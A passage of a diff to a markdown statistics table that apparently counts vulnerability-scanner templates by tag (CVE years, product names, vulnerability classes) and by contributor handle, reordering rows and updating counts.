.pre-commit-config.yaml | 1 | | | | | +| default-login | 50 | techbrunchfr | 13 | | | | | | | +| iot | 43 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | cyllective | 11 | | | | | | | +| file | 42 | random_robbie | 10 | | | | | | | +| unauth | 40 | righettod | 9 | | | | | | | +| network | 35 | wdahlenb | 9 | | | | | | | +| sqli | 34 | hackergautam | 8 | | | | | | | | oob | 32 | nadino | 8 | | | | | | | -| workflow | 29 | iamthefrogy | 8 | | | | | | | -| oracle | 29 | that_juan_ | 8 | | | | | | | -| logs | 29 | hackergautam | 8 | | | | | | | -| misc | 27 | melbadry9 | 8 | | | | | | | -| ssrf | 27 | randomstr1ng | 7 | | | | | | | -| jira | 26 | 0x240x23elu | 7 | | | | | | | -| atlassian | 26 | oppsec | 7 | | | | | | | -| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | -| cve2016 | 24 | harshbothra_ | 7 | | | | | | | -| listing | 23 | emadshanab | 7 | | | | | | | -| redirect | 21 | kophjager007 | 7 | | | | | | | -| aem | 19 | r3dg33k | 7 | | | | | | | -| cisco | 18 | dr_set | 7 | | | | | | | -| sap | 16 | caspergn | 6 | | | | | | | -| cve2015 | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | __fazal | 6 | | | | | | | -| misconfig | 13 | yanyun | 5 | | | | | | | -| struts | 13 | pentest_swissky | 5 | | | | | | | -| android | 13 | joanbono | 5 | | | | | | | -| fuzz | 13 | ganofins | 5 | | | | | | | -| adobe | 12 | panch0r3d | 5 | | | | | | | -| weblogic | 12 | nodauf | 4 | | | | | | | -| cve2012 | 12 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 12 | xelkomy | 4 | | | | | | | -| zoho | 11 | meme-lord | 4 | | | | | | | -| cve2011 | 11 | e_schultze_ | 4 | | | | | | | -| dns | 11 | rootxharsh | 4 | | | | | | | -| springboot | 11 | elsfa7110 | 4 | | | | | | | -| jenkins | 11 | iamnoooob | 4 | | | | | | | -| dlink | 10 | jarijaas | 3 | | | | | | | -| cve2014 | 10 | dudez | 3 | | | | | | | -| cve2013 | 10 | thomas_from_offensity | 3 | | | | | | | -| devops | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | impramodsargar | 3 | | | | | | | -| router | 9 | f1tz | 3 | | | | | | | -| magento | 9 | tess | 3 | | | | | | | -| airflow | 8 | yash anand @yashanand155 | 3 | | | | | | | -| aws | 8 | shine | 3 | | | | | | | -| ftp | 8 | _generic_human_ | 3 | | | | | | | -| cnvd | 8 | z3bd | 3 | | | | | | | -| gitlab | 8 | fyoorer | 3 | | | | | | | -| rails | 8 | 0w4ys | 3 | | | | | | | -| nginx | 7 | binaryfigments | 3 | | | | | | | -| xxe | 7 | fabaff | 2 | | | | | | | -| scada | 7 | 0xsapra | 2 | | | | | | | -| vmware | 7 | nkxxkn | 2 | | | | | | | -| cve2009 | 7 | hahwul | 2 | | | | | | | -| joomla | 7 | ehsahil | 2 | | | | | | | -| dell | 6 | zomsop82 | 2 | | | | | | | -| jetty | 6 | emenalf | 2 | | | | | | | -| coldfusion | 6 | foulenzer | 2 | | | | | | | -| backup | 6 | davidmckennirey | 2 | | | | | | | -| rconfig | 6 | manas_harsh | 2 | | | | | | | -| google | 6 | afaq | 2 | | | | | | | -| citrix | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| cms | 6 | 0xrudra | 2 | | | | | | | -| api | 6 | incogbyte | 2 | | | | | | | -| lucee | 5 | pxmme1337 | 2 | | | | | | | -| drupal | 5 | bing0o | 2 | | | | | | | -| circarlife | 5 | 0xcrypto | 2 | | | | | | | -| ibm | 5 | alifathi-h1 | 2 | | | | | | | -| dedecms | 5 | hetroublemakr | 2 | | | | | | | -| django | 5 | w4cky_ | 2 | | | | | | | -| netgear | 5 | vavkamil | 2 | | | | | | | -| fileupload | 5 | lotusdll | 2 | | | | | | | -| laravel | 5 | x1m_martijn | 2 | | | | | | | -| files | 5 | shifacyclewala | 2 | | | | | | | -| phpmyadmin | 5 | unstabl3 | 2 | | | | | | | -| headless | 5 | amsda | 2 | | | | | | | -| ssti | 5 | random-robbie | 2 | | | | | | | -| solr | 5 | joeldeleep | 2 | | | | | | | -| confluence | 5 | bsysop | 2 | | | | | | | -| ruijie | 5 | bp0lr | 2 | | | | | | | -| login | 5 | swissky | 2 | | | | | | | -| iis | 5 | udit_thakkur | 2 | | | | | | | -| java | 5 | 0xprial | 2 | | | | | | | -| tomcat | 4 | gevakun | 2 | | | | | | | -| asp | 4 | moritz nentwig | 2 | | | | | | | -| webserver | 4 | koti2 | 2 | | | | | | | -| vpn | 4 | ree4pwn | 2 | | | | | | | -| artifactory | 4 | kiblyn11 | 2 | | | | | | | -| elastic | 4 | randomrobbie | 2 | | | | | | | -| traversal | 4 | dheerajmadhukar | 2 | | | | | | | -| crlf | 4 | lu4nx | 2 | | | | | | | -| docker | 4 | 0xelkomy | 2 | | | | | | | -| moodle | 4 | zhenwarx | 1 | | | | | | | -| solarwinds | 4 | 52971 | 1 | | | | | | | -| nodejs | 4 | arcc | 1 | | | | | | | -| thinkcmf | 4 | ldionmarcil | 1 | | | | | | | -| hongdian | 4 | kabirsuda | 1 | | | | | | | -| samsung | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| deserialization | 4 | gal nagli | 1 | | | | | | | -| magmi | 4 | andirrahmani1 | 1 | | | | | | | -| thinkphp | 4 | aceseven (digisec360) | 1 | | | | | | | -| jolokia | 4 | soyelmago | 1 | | | | | | | -| terramaster | 3 | knassar702 | 1 | | | | | | | -| amazon | 3 | yashgoti | 1 | | | | | | | -| bitrix | 3 | johnjhacking | 1 | | | | | | | -| itop | 3 | exploitation | 1 | | | | | | | -| kubernetes | 3 | berkdusunur | 1 | | | | | | | -| lfr | 3 | bjhulst | 1 | | | | | | | -| fpd | 3 | micha3lb3n | 1 | | | | | | | -| vbulletin | 3 | bernardo rodrigues | 1 | | | | | | | +| logs | 29 | aashiq | 8 | | | | | | | +| oracle | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 29 | melbadry9 | 8 | | | | | | | +| ssrf | 27 | that_juan_ | 8 | | | | | | | +| misc | 27 | randomstr1ng | 7 | | | | | | | +| jira | 26 | dr_set | 7 | | | | | | | +| atlassian | 26 | emadshanab | 7 | | | | | | | +| disclosure | 25 | 0x240x23elu | 7 | | | | | | | +| cve2016 | 23 | oppsec | 7 | | | | | | | +| listing | 22 | harshbothra_ | 7 | | | | | | | +| redirect | 20 | techryptic (@tech) | 7 | | | | | | | +| aem | 19 | kophjager007 | 7 | | | | | | | +| cisco | 17 | r3dg33k | 7 | | | | | | | +| sap | 16 | puzzlepeaches | 6 | | | | | | | +| debug | 14 | caspergn | 6 | | | | | | | +| misconfig | 13 | __fazal | 6 | | | | | | | +| struts | 13 | yanyun | 5 | | | | | | | +| fuzz | 13 | joanbono | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| adobe | 12 | ganofins | 5 | | | | | | | +| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | +| weblogic | 12 | meme-lord | 4 | | | | | | | +| android | 12 | iamnoooob | 4 | | | | | | | +| dns | 11 | xelkomy | 4 | | | | | | | +| cve2012 | 11 | nodauf | 4 | | | | | | | +| zoho | 11 | elsfa7110 | 4 | | | | | | | +| springboot | 11 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 11 | rootxharsh | 4 | | | | | | | +| cve2014 | 10 | e_schultze_ | 4 | | | | | | | +| devops | 10 | impramodsargar | 3 | | | | | | | +| jenkins | 10 | z3bd | 3 | | | | | | | +| cve2013 | 10 | mavericknerd | 3 | | | | | | | +| php | 10 | binaryfigments | 3 | | | | | | | +| dlink | 10 | tess | 3 | | | | | | | +| magento | 9 | dudez | 3 | | | | | | | +| gitlab | 8 | shine | 3 | | | | | | | +| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | +| rails | 8 | fyoorer | 3 | | | | | | | +| aws | 8 | f1tz | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | +| cnvd | 8 | _generic_human_ | 3 | | | | | | | +| router | 8 | jarijaas | 3 | | | | | | | +| joomla | 7 | 0w4ys | 3 | | | | | | | +| nginx | 7 | ree4pwn | 2 | | | | | | | +| scada | 7 | joeldeleep | 2 | | | | | | | +| xxe | 7 | 0xsapra | 2 | | | | | | | +| vmware | 7 | incogbyte | 2 | | | | | | | +| coldfusion | 6 | x1m_martijn | 2 | | | | | | | +| jetty | 6 | vavkamil | 2 | | | | | | | +| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | +| google | 6 | amsda | 2 | | | | | | | +| backup | 6 | fabaff | 2 | | | | | | | +| citrix | 6 | 0xrudra | 2 | | | | | | | +| api | 6 | 0xcrypto | 2 | | | | | | | +| cms | 6 | hetroublemakr | 2 | | | | | | | +| lucee | 5 | koti2 | 2 | | | | | | | +| java | 5 | 0xelkomy | 2 | | | | | | | +| dedecms | 5 | davidmckennirey | 2 | | | | | | | +| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| drupal | 5 | bp0lr | 2 | | | | | | | +| django | 5 | udit_thakkur | 2 | | | | | | | +| dell | 5 | nkxxkn | 2 | | | | | | | +| circarlife | 5 | bing0o | 2 | | | | | | | +| ibm | 5 | bsysop | 2 | | | | | | | +| ssti | 5 | ehsahil | 2 | | | | | | | +| confluence | 5 | gevakun | 2 | | | | | | | +| cve2009 | 5 | lotusdll | 2 | | | | | | | +| netgear | 5 | lu4nx | 2 | | | | | | | +| login | 5 | random-robbie | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| laravel | 5 | manas_harsh | 2 | | | | | | | +| solr | 5 | moritz nentwig | 2 | | | | | | | +| iis | 5 | unstabl3 | 2 | | | | | | | +| phpmyadmin | 5 | afaq | 2 | | | | | | | +| files | 5 | pxmme1337 | 2 | | | | | | | +| thinkphp | 4 | 0xprial | 2 | | | | | | | +| hongdian | 4 | emenalf | 2 | | | | | | | +| solarwinds | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | shifacyclewala | 2 | | | | | | | +| tomcat | 4 | w4cky_ | 2 | | | | | | | +| samsung | 4 | foulenzer | 2 | | | | | | | +| jolokia | 4 | swissky | 2 | | | | | | | +| webserver | 4 | kiblyn11 | 2 | | | | | | | +| elastic | 4 | thevillagehacker | 1 | | | | | | | +| traversal | 4 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| slack | 3 | flag007 | 1 | | | | | | | -| bypass | 3 | yavolo | 1 | | | | | | | -| ebs | 3 | its0x08 | 1 | | | | | | | -| grafana | 3 | fmunozs | 1 | | | | | | | -| hp | 3 | sshell | 1 | | | | | | | -| cve2010 | 3 | sy3omda | 1 | | | | | | | -| windows | 3 | affix | 1 | | | | | | | -| kafka | 3 | 0xrod | 1 | | | | | | | -| zabbix | 3 | apt-mirror | 1 | | | | | | | -| ssh | 3 | dogasantos | 1 | | | | | | | -| caucho | 3 | thevillagehacker | 1 | | | | | | | -| microstrategy | 3 | taielab | 1 | | | | | | | -| nosqli | 3 | ahmed sherif | 1 | | | | | | | -| backups | 3 | ilovebinbash | 1 | | | | | | | -| oa | 3 | alex | 1 | | | | | | | -| resin | 3 | kareemse1im | 1 | | | | | | | -| printer | 3 | noamrathaus | 1 | | | | | | | -| targa | 3 | johnk3r | 1 | | | | | | | -| mongodb | 3 | retr0 | 1 | | | | | | | -| fanruan | 3 | bolli95 | 1 | | | | | | | -| springcloud | 3 | d0rkerdevil | 1 | | | | | | | -| r-seenet | 3 | 0h1in9e | 1 | | | | | | | -| openssh | 3 | 0xtavian | 1 | | | | | | | -| nacos | 3 | b4uh0lz | 1 | | | | | | | -| ofbiz | 3 | rodnt | 1 | | | | | | | -| log | 3 | andysvints | 1 | | | | | | | -| git | 3 | sickwell | 1 | | | | | | | -| sonicwall | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| glassfish | 2 | vzamanillo | 1 | | | | | | | -| flir | 2 | blckraven | 1 | | | | | | | -| horde | 2 | jeya seelan | 1 | | | | | | | -| injection | 2 | dawid czarnecki | 1 | | | | | | | -| jsf | 2 | jteles | 1 | | | | | | | -| ecology | 2 | geraldino2 | 1 | | | | | | | -| prometheus | 2 | aresx | 1 | | | | | | | -| microsoft | 2 | bernardofsr | 1 | | | | | | | -| github | 2 | deena | 1 | | | | | | | -| spark | 2 | rtcms | 1 | | | | | | | -| pega | 2 | tirtha_mandal | 1 | | | | | | | -| shellshock | 2 | hanlaomo | 1 | | | | | | | -| maian | 2 | huowuzhao | 1 | | | | | | | -| kibana | 2 | regala_ | 1 | | | | | | | -| huawei | 2 | daviey | 1 | | | | | | | -| openfire | 2 | luskabol | 1 | | | | | | | -| zhiyuan | 2 | @github.com/defr0ggy | 1 | | | | | | | -| cache | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| paloalto | 2 | @dwisiswant0 | 1 | | | | | | | -| ucmdb | 2 | kba@sogeti_esec | 1 | | | | | | | -| idrac | 2 | alperenkesk | 1 | | | | | | | -| igs | 2 | mubassirpatel | 1 | | | | | | | -| webcam | 2 | smaranchand | 1 | | | | | | | -| intrusive | 2 | bad5ect0r | 1 | | | | | | | -| couchdb | 2 | undefl0w | 1 | | | | | | | -| smtp | 2 | divya_mudgal | 1 | | | | | | | -| waf | 2 | c3l3si4n | 1 | | | | | | | -| fortios | 2 | qlkwej | 1 | | | | | | | -| cve2007 | 2 | iampritam | 1 | | | | | | | -| sonarqube | 2 | shelld3v | 1 | | | | | | | -| bigip | 2 | _darrenmartyn | 1 | | | | | | | -| smb | 2 | ohlinge | 1 | | | | | | | -| hjtcloud | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| jboss | 2 | naglinagli | 1 | | | | | | | -| chamilo | 2 | absshax | 1 | | | | | | | -| nextjs | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| rstudio | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| globalprotect | 2 | tim_koopmans | 1 | | | | | | | -| seeyon | 2 | makyotox | 1 | | | | | | | -| rockethchat | 2 | elmahdi | 1 | | | | | | | -| hashicorp | 2 | sicksec | 1 | | | | | | | -| xxljob | 2 | ajaysenr | 1 | | | | | | | -| wordfence | 2 | 0xteles | 1 | | | | | | | -| akamai | 2 | fopina | 1 | | | | | | | -| trixbox | 2 | akshansh | 1 | | | | | | | -| frp | 2 | petruknisme | 1 | | | | | | | -| nexus | 2 | yashanand155 | 1 | | | | | | | -| dos | 2 | whynotke | 1 | | | | | | | -| hpe | 2 | thezakman | 1 | | | | | | | -| vrealize | 2 | ooooooo_q | 1 | | | | | | | -| activemq | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| sharepoint | 2 | b0yd | 1 | | | | | | | -| leak | 2 | furkansenan | 1 | | | | | | | -| plesk | 2 | 0ut0fb4nd | 1 | | | | | | | -| mida | 2 | akash.c | 1 | | | | | | | -| kentico | 2 | mohammedsaneem | 1 | | | | | | | -| nagios | 2 | schniggie | 1 | | | | | | | -| openam | 2 | notsoevilweasel | 1 | | | | | | | -| kevinlab | 2 | pudsec | 1 | | | | | | | -| splunk | 2 | raesene | 1 | | | | | | | -| phpcollab | 2 | willd96 | 1 | | | | | | | -| showdoc | 2 | mah3sec_ | 1 | | | | | | | -| jellyfin | 2 | zandros0 | 1 | | | | | | | -| yapi | 2 | sullo | 1 | | | | | | | -| saltstack | 2 | aaron_costello | 1 | | | | | | | +| vpn | 4 | sshell | 1 | | | | | | | +| artifactory | 4 | gal nagli | 1 | | | | | | | +| fileupload | 4 | mubassirpatel | 1 | | | | | | | +| nodejs | 4 | furkansenan | 1 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| crlf | 4 | thezakman | 1 | | | | | | | +| asp | 4 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| icewarp | 2 | kurohost | 1 | | | | | | | -| rockmongo | 2 | mhdsamx | 1 | | | | | | | -| strapi | 2 | manuelbua | 1 | | | | | | | -| telerik | 2 | defr0ggy | 1 | | | | | | | -| chiyu | 2 | idealphase | 1 | | | | | | | -| httpd | 2 | remonsec | 1 | | | | | | | -| emerge | 2 | ratnadip gajbhiye | 1 | | | | | | | -| natshell | 2 | s1r1u5_ | 1 | | | | | | | -| service | 2 | gboddin | 1 | | | | | | | -| cve2008 | 2 | j33n1k4 | 1 | | | | | | | -| keycloak | 2 | philippdelteil | 1 | | | | | | | -| voipmonitor | 2 | hakluke | 1 | | | | | | | -| proxy | 2 | me9187 | 1 | | | | | | | -| jeedom | 2 | patralos | 1 | | | | | | | -| odoo | 2 | toufik airane | 1 | | | | | | | -| oauth | 2 | ringo | 1 | | | | | | | -| mail | 2 | juicypotato1 | 1 | | | | | | | -| linkerd | 2 | elder tao | 1 | | | | | | | -| gloo | 1 | chron0x | 1 | | | | | | | -| aura | 1 | revblock | 1 | | | | | | | -| seacms | 1 | th3.d1p4k | 1 | | | | | | | -| bash | 1 | _harleo | 1 | | | | | | | -| postmessage | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| floc | 1 | vsh00t | 1 | | | | | | | -| scs | 1 | cookiehanhoan | 1 | | | | | | | -| codemeter | 1 | abison_binoy | 1 | | | | | | | -| avalanche | 1 | rojanrijal | 1 | | | | | | | -| rfi | 1 | alph4byt3 | 1 | | | | | | | -| dotclear | 1 | ipanda | 1 | | | | | | | -| svnserve | 1 | co0nan | 1 | | | | | | | -| favicon | 1 | r3naissance | 1 | | | | | | | -| nedi | 1 | pdp | 1 | | | | | | | -| fortigate | 1 | becivells | 1 | | | | | | | -| nordex | 1 | omarkurt | 1 | | | | | | | -| nomad | 1 | nytr0gen | 1 | | | | | | | -| pagespeed | 1 | shifacyclewla | 1 | | | | | | | -| opensns | 1 | shreyapohekar | 1 | | | | | | | -| ssl | 1 | streetofhackerr007 | 1 | | | | | | | -| idemia | 1 | wabafet | 1 | | | | | | | -| mobileiron | 1 | _c0wb0y_ | 1 | | | | | | | -| octobercms | 1 | luci | 1 | | | | | | | -| discourse | 1 | un-fmunozs | 1 | | | | | | | -| firebase | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| akkadian | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | +| docker | 4 | j33n1k4 | 1 | | | | | | | +| thinkcmf | 4 | kareemse1im | 1 | | | | | | | +| grafana | 3 | divya_mudgal | 1 | | | | | | | +| springcloud | 3 | 0xrod | 1 | | | | | | | +| slack | 3 | naglinagli | 1 | | | | | | | +| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | +| nacos | 3 | _darrenmartyn | 1 | | | | | | | +| ofbiz | 3 | johnjhacking | 1 | | | | | | | +| windows | 3 | bad5ect0r | 1 | | | | | | | +| nosqli | 3 | regala_ | 1 | | | | | | | +| backups | 3 | geraldino2 | 1 | | | | | | | +| fpd | 3 | smaranchand | 1 | | | | | | | +| kubernetes | 3 | wabafet | 1 | | | | | | | +| hp | 3 | gboddin | 1 | | | | | | | +| ebs | 3 | makyotox | 1 | | | | | | | +| targa | 3 | chron0x | 1 | | | | | | | +| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| vbulletin | 3 | akash.c | 1 | | | | | | | +| oa | 3 | fmunozs | 1 | | | | | | | +| r-seenet | 3 | daviey | 1 | | | | | | | +| amazon | 3 | blckraven | 1 | | | | | | | +| resin | 3 | alex | 1 | | | | | | | +| caucho | 3 | knassar702 | 1 | | | | | | | +| cve2010 | 3 | remonsec | 1 | | | | | | | +| mongodb | 3 | noamrathaus | 1 | | | | | | | +| fanruan | 3 | soyelmago | 1 | | | | | | | +| deserialization | 3 | shreyapohekar | 1 | | | | | | | +| log | 3 | ohlinge | 1 | | | | | | | +| git | 3 | cookiehanhoan | 1 | | | | | | | +| openssh | 3 | retr0 | 1 | | | | | | | +| terramaster | 3 | 0xtavian | 1 | | | | | | | +| bypass | 3 | bolli95 | 1 | | | | | | | +| kafka | 3 | ldionmarcil | 1 | | | | | | | +| lfr | 3 | fopina | 1 | | | | | | | +| printer | 3 | jeya seelan | 1 | | | | | | | +| frp | 2 | nytr0gen | 1 | | | | | | | +| jboss | 2 | rtcms | 1 | | | | | | | +| ucmdb | 2 | elmahdi | 1 | | | | | | | +| webcam | 2 | defr0ggy | 1 | | | | | | | +| plesk | 2 | c3l3si4n | 1 | | | | | | | +| microsoft | 2 | vsh00t | 1 | | | | | | | +| proxy | 2 | exploitation | 1 | | | | | | | +| trixbox | 2 | andysvints | 1 | | | | | | | +| paloalto | 2 | 52971 | 1 | | | | | | | +| xxljob | 2 | mah3sec_ | 1 | | | | | | | +| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| smb | 2 | sickwell | 1 | | | | | | | +| linkerd | 2 | dawid czarnecki | 1 | | | | | | | +| natshell | 2 | affix | 1 | | | | | | | +| jellyfin | 2 | yashanand155 | 1 | | | | | | | +| globalprotect | 2 | mhdsamx | 1 | | | | | | | +| httpd | 2 | whynotke | 1 | | | | | | | +| hjtcloud | 2 | bjhulst | 1 | | | | | | | +| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | +| cache | 2 | raesene | 1 | | | | | | | +| showdoc | 2 | undefl0w | 1 | | | | | | | +| vrealize | 2 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| dos | 2 | ipanda | 1 | | | | | | | +| kibana | 2 | co0nan | 1 | | | | | | | +| mida | 2 | patralos | 1 | | | | | | | +| oauth | 2 | sicksec | 1 | | | | | | | +| fortios | 2 | hakluke | 1 | | | | | | | +| rstudio | 2 | luci | 1 | | | | | | | +| strapi | 2 | ahmed sherif | 1 | | | | | | | +| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | +| shellshock | 2 | rojanrijal | 1 | | | | | | | +| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | +| intrusive | 2 | alph4byt3 | 1 | | | | | | | +| kentico | 2 | b0yd | 1 | | | | | | | +| emerge | 2 | hanlaomo | 1 | | | | | | | +| kevinlab | 2 | revblock | 1 | | | | | | | +| hpe | 2 | sullo | 1 | | | | | | | +| mail | 2 | andirrahmani1 | 1 | | | | | | | +| ecology | 2 | sy3omda | 1 | | | | | | | +| yapi | 2 | kabirsuda | 1 | | | | | | | +| idrac | 2 | alifathi-h1 | 1 | | | | | | | +| splunk | 2 | idealphase | 1 | | | | | | | +| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | +| rockmongo | 2 | deena | 1 | | | | | | | +| openam | 2 | taielab | 1 | | | | | | | +| zhiyuan | 2 | alperenkesk | 1 | | | | | | | +| seeyon | 2 | micha3lb3n | 1 | | | | | | | +| wordfence | 2 | shelld3v | 1 | | | | | | | +| smtp | 2 | becivells | 1 | | | | | | | +| odoo | 2 | s1r1u5_ | 1 | | | | | | | +| service | 2 | toufik airane | 1 | | | | | | | +| waf | 2 | luskabol | 1 | | | | | | | +| nagios | 2 | arcc | 1 | | | | | | | +| rockethchat | 2 | schniggie | 1 | | | | | | | +| zabbix | 2 | th3.d1p4k | 1 | | | | | | | +| chiyu | 2 | 0xteles | 1 | | | | | | | +| couchdb | 2 | _harleo | 1 | | | | | | | +| prometheus | 2 | pdp | 1 | | | | | | | +| injection | 2 | kurohost | 1 | | | | | | | +| telerik | 2 | notsoevilweasel | 1 | | | | | | | +| chamilo | 2 | ringo | 1 | | | | | | | +| nexus | 2 | pudsec | 1 | | | | | | | +| bigip | 2 | omarkurt | 1 | | | | | | | +| huawei | 2 | flag007 | 1 | | | | | | | +| glassfish | 2 | dogasantos | 1 | | | | | | | +| leak | 2 | vzamanillo | 1 | | | | | | | +| voipmonitor | 2 | yavolo | 1 | | | | | | | +| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | +| pega | 2 | juicypotato1 | 1 | | | | | | | +| igs | 2 | ilovebinbash | 1 | | | | | | | +| maian | 2 | iampritam | 1 | | | | | | | +| spark | 2 | abison_binoy | 1 | | | | | | | +| hashicorp | 2 | 0h1in9e | 1 | | | | | | | +| saltstack | 2 | apt-mirror | 1 | | | | | | | +| icewarp | 2 | yashgoti | 1 | | | | | | | +| activemq | 2 | willd96 | 1 | | | | | | | +| sonicwall | 2 | absshax | 1 | | | | | | | +| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| nextjs | 2 | tirtha_mandal | 1 | | | | | | | +| redcap | 1 | _c0wb0y_ | 1 | | | | | | | +| mantis | 1 | r3naissance | 1 | | | | | | | +| npm | 1 | aceseven (digisec360) | 1 | | | | | | | +| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| 